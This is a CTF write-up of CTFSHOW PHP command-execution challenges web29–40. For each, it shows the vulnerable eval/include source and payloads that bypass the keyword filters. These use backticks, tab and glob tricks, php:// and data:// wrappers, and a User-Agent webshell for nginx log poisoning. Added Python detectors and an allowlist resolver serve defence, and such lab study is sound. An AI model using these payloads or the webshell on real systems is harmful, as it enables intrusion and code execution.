CTFSHOW - Command Execution

web29 wildcard bypass

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:26:48
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
eval($c);
}

}else{
highlight_file(__FILE__);
}

Only the string flag is filtered, and the i modifier makes the match case-insensitive, so there are many ways through. (Because of the browser's HTML parsing, a <?php ... ?> block in the response is treated like a comment and not rendered, so always look at the HTML source to make sure you are seeing the real response.)

?c=eval($_GET['d']);&d=echo `cat flag.php`;

web30 executing system commands with backticks

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:42:26
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php/i", $c)){
eval($c);
}

}else{
highlight_file(__FILE__);
}

flag, system and php are filtered; backticks can replace system. Some background:

Single quotes, double quotes and backticks in Linux shells

Single quotes: everything inside is taken literally as a string; commands and special characters are ignored.

Double quotes: special characters and variables inside are expanded; to output a special character literally, escape it with \.

Backticks: the string between the backticks is executed as a command; backticks are equivalent to $(command).

web31 space bypass

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:49:10
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
eval($c);
}

}else{
highlight_file(__FILE__);
}

This challenge also filters the space and the single quote '; a tab (%09) can stand in for the space. For cat, more, less or /bin/ca* all work.

?c=echo%09`/bin/ca*%09fla*`;
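The web29-31 filters are keyword denylists applied to the raw parameter, which is why a tab in place of a space or a glob in place of a filename slips past them. As an added example that is not part of the original writeup, the Python below models those three preg_match denylists and contrasts them with a detector that first normalises the value (URL-decode, fold tab/newline/$IFS onto a space) and then looks for structural signals rather than words; the signal names, the normalisation rules and the sample inputs are my own choices, not anything from the challenge source.

```python
import re
from urllib.parse import unquote

# The denylists from the web29-31 source, as Python regexes (case-insensitive like /i).
DENYLISTS = {
    "web29": re.compile(r"flag", re.I),
    "web30": re.compile(r"flag|system|php", re.I),
    "web31": re.compile(r"flag|system|php|cat|sort|shell|\.| |'", re.I),
}

def passes_denylist(level: str, c: str) -> bool:
    """True when the challenge's preg_match would let `c` reach eval()."""
    return DENYLISTS[level].search(c) is None

# Whitespace substitutes that the denylist's literal " " does not cover:
# tab/newline/vertical-tab/form-feed (%09, %0a, ...) and the shell's $IFS.
WHITESPACE_SUBSTITUTES = re.compile(r"[\t\n\r\x0b\x0c]|\$\{IFS\}|\$IFS")

def normalize(raw: str) -> str:
    """Approximate what the interpreter eventually sees: URL-decode as PHP does
    for $_GET, then fold every whitespace substitute onto a plain space."""
    return WHITESPACE_SUBSTITUTES.sub(" ", unquote(raw))

# Structural signals (assumed names), evaluated on the normalised text rather
# than on keywords: backtick execution, exec-style calls, a nested superglobal
# (the eval($_GET[...]) staging trick) and a glob pattern inside a path (/bin/ca*).
SIGNALS = [
    ("backtick_exec", re.compile(r"`[^`]+`")),
    ("exec_call", re.compile(r"\b(system|exec|passthru|shell_exec|popen|proc_open|eval)\s*\(", re.I)),
    ("nested_superglobal", re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\s*\[", re.I)),
    ("glob_in_path", re.compile(r"/[\w/]*[*?]")),
]

def detect(raw: str) -> list:
    """Names of the signals present in the raw `c` parameter value."""
    text = normalize(raw)
    return [name for name, pat in SIGNALS if pat.search(text)]

if __name__ == "__main__":
    # The writeup's own payloads, as they arrive on the wire (constructed input).
    for level, raw in [("web29", "eval($_GET['d']);"), ("web31", "echo%09`/bin/ca*%09fla*`;")]:
        print(level, "denylist passes:", passes_denylist(level, unquote(raw)), "signals:", detect(raw))
```

Both payloads pass their respective denylists and both trip the normalising detector. The detector is still only a monitoring aid: the actual fix for this class of bug is to never pass request data to eval() or to a shell at all.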

web32-36 file inclusion + stream wrappers

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:56:31
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
eval($c);
}

}else{
highlight_file(__FILE__);
}

File inclusion (include/require) + a stream wrapper to read the file: the semicolon is filtered, so the statement is closed with ?> instead. 32-36 share the same payload. For the stream-wrapper details see: https://segmentfault.com/a/1190000018991087

# PHP stream wrappers
c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php
c=include$_GET[a]?>&a=data://text/palin,<?php system("tac flag.php");?>
c=include$_GET[a]?>&a=data://text/palin;base64,PD9waHAgc3lzdGVtKCJ0YWMgZmxhZy5waHAiKTs/Pg==

33: on top of the previous challenge, " is also filtered

if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\"/i", $c))

34: the colon : is also filtered

if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"/i", $c))

35: < and = are also filtered

if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=/i", $c))

36: digits are also filtered (the regex adds / as well); just use a letter instead of a number as the parameter name.

if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=|\/|[0-9]/i", $c))

web37-38 stream wrappers | getshell via log file

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 05:18:55
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
include($c);
echo $flag;

}

}else{
highlight_file(__FILE__);
}

include parses and executes whatever it loads, so read the flag through a stream wrapper:

?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCd0YWMgZmxhZy5waHAnKTs/Pg==

Log-file inclusion via the User-Agent header also works: set User-Agent to a one-line webshell. The server is nginx. Edit the request, swap the Host header for the challenge host, send it, and then connect with AntSword:

GET /?c=/var/log/nginx/access.log HTTP/1.1
Host: 8eb33014-6450-42ce-a300-148f42aa4b9a.challenge.ctf.show
User-Agent: <?php @eval($_POST['d']);?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
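The log-poisoning route above leaves two traces in the same access log it abuses: a request header carrying an opening PHP tag, and a request whose include parameter points at the log file. As an added example that is not part of the original writeup, the Python below parses nginx's default "combined" log format and flags both halves; the log format assumption, the list of sensitive paths and the sample lines are constructed by me (the poisoned User-Agent string is the one from the request shown above).

```python
import re
from urllib.parse import unquote

# nginx "combined" access_log format (the default); an assumption, not taken from the challenge.
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# Opening PHP tags: the technique only works if the logged line contains one.
PHP_TAG = re.compile(r"<\?(php|=)", re.I)
# Files an include() parameter should never point at (assumed list).
LOG_PATHS = ("/var/log/", "access.log", "error.log", "/proc/self/")

def analyze_line(line: str) -> list:
    """Signal names for one access-log line (empty list = nothing suspicious)."""
    m = COMBINED.match(line)
    if not m:
        return ["unparsed"]
    findings = []
    request = unquote(m["request"])
    # The write half: PHP code planted in a header that nginx copies into the log.
    if PHP_TAG.search(m["ua"]) or PHP_TAG.search(m["referer"]):
        findings.append("php_tag_in_header")
    # The read half: a request parameter steering include() at the log file.
    if any(p in request for p in LOG_PATHS):
        findings.append("log_path_in_request")
    return findings

def scan(lines) -> dict:
    """Map line index -> findings for every flagged line."""
    return {i: f for i, f in ((i, analyze_line(l)) for i, l in enumerate(lines)) if f}

# Constructed sample log: a normal hit, the poisoning request, the read-back, a benign page.
SAMPLE_LOG = [
    '203.0.113.7 - - [04/Sep/2020:05:20:01 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [04/Sep/2020:05:20:05 +0000] "GET /?c=/var/log/nginx/access.log HTTP/1.1" 200 1045 "-" "<?php @eval($_POST[\'d\']);?>"',
    '203.0.113.7 - - [04/Sep/2020:05:20:09 +0000] "POST /?c=/var/log/nginx/access.log HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
    '198.51.100.2 - - [04/Sep/2020:05:21:00 +0000] "GET /?c=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for i, f in scan(SAMPLE_LOG).items():
        print(i, f)
```

A single line carrying both signals, as in the second sample, is the strongest indicator; the same client later sending POSTs to the log path is the follow-up traffic. The mitigations that remove the bug are an allowlist for the include target and keeping the PHP worker unable to read the web server's log directory.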

web39

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 06:13:21
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
include($c.".php");
}

}else{
highlight_file(__FILE__);
}

?> can be used to close the PHP code, so the .php appended after it is treated as ordinary HTML text and simply displayed on the page. Remember the quote trick to get past the regex filter.

?c=data://text/plain,<?= system("tac fla''g.php");?>
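Every payload in web32-36 and web39 works because include() accepts a stream wrapper (php://, data://) or an arbitrary path straight from the request, and in web39 the appended ".php" is neutralised by data:// plus a closing ?>. As an added example that is not part of the original writeup, the Python below shows the two defensive pieces a reviewer would ask for: a classifier that labels what an include argument actually is, and an allowlist resolver that maps a page name to a file and never touches wrappers or paths. The allowlist, base directory and signal names are constructed assumptions of mine.

```python
import posixpath
import re
from typing import Optional
from urllib.parse import unquote

# Any "scheme:" prefix hands include() to a PHP stream wrapper (php://, data://,
# phar://, http://, ...); the writeup's payloads all rely on php:// or data://.
WRAPPER = re.compile(r"^\s*([a-z][a-z0-9+.\-]*):", re.I)

# Constructed allowlist and base directory for the hardened resolver (assumed values).
ALLOWED_PAGES = {"index", "about", "contact"}
BASE_DIR = "/var/www/html/pages"

def classify_include_arg(raw: str) -> str:
    """Label the raw include() argument the way a request filter would see it."""
    value = unquote(raw)
    m = WRAPPER.match(value)
    if m:
        return "wrapper:" + m.group(1).lower()
    if value.startswith("/"):
        return "absolute_path"
    if ".." in value.split("/"):
        return "traversal"
    return "relative"

def resolve_include(raw: str) -> Optional[str]:
    """Allowlist resolver: the parameter is a page *name*, never a path or a
    wrapper. Anything outside ALLOWED_PAGES yields None instead of a file.
    Appending ".php" is only safe because the name is already allowlisted;
    on its own (web39) the suffix is defeated by data:// plus a closing ?>."""
    name = unquote(raw)
    if name not in ALLOWED_PAGES:
        return None
    path = posixpath.normpath(posixpath.join(BASE_DIR, name + ".php"))
    # Defence in depth: the resolved path must still sit under BASE_DIR.
    if not path.startswith(BASE_DIR + "/"):
        return None
    return path

if __name__ == "__main__":
    for raw in ["php://filter/read=convert.base64-encode/resource=flag.php",
                "data://text/plain,hello", "/var/log/nginx/access.log",
                "../../etc/passwd", "about"]:
        print(classify_include_arg(raw), "->", resolve_include(raw))
```

The classifier is what you would wire into logging or a WAF rule; the resolver is the code change. Note that the classifier URL-decodes once, as PHP does for $_GET, so a double-encoded colon would need a second pass before it is recognised as a wrapper.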

web40 parameterless RCE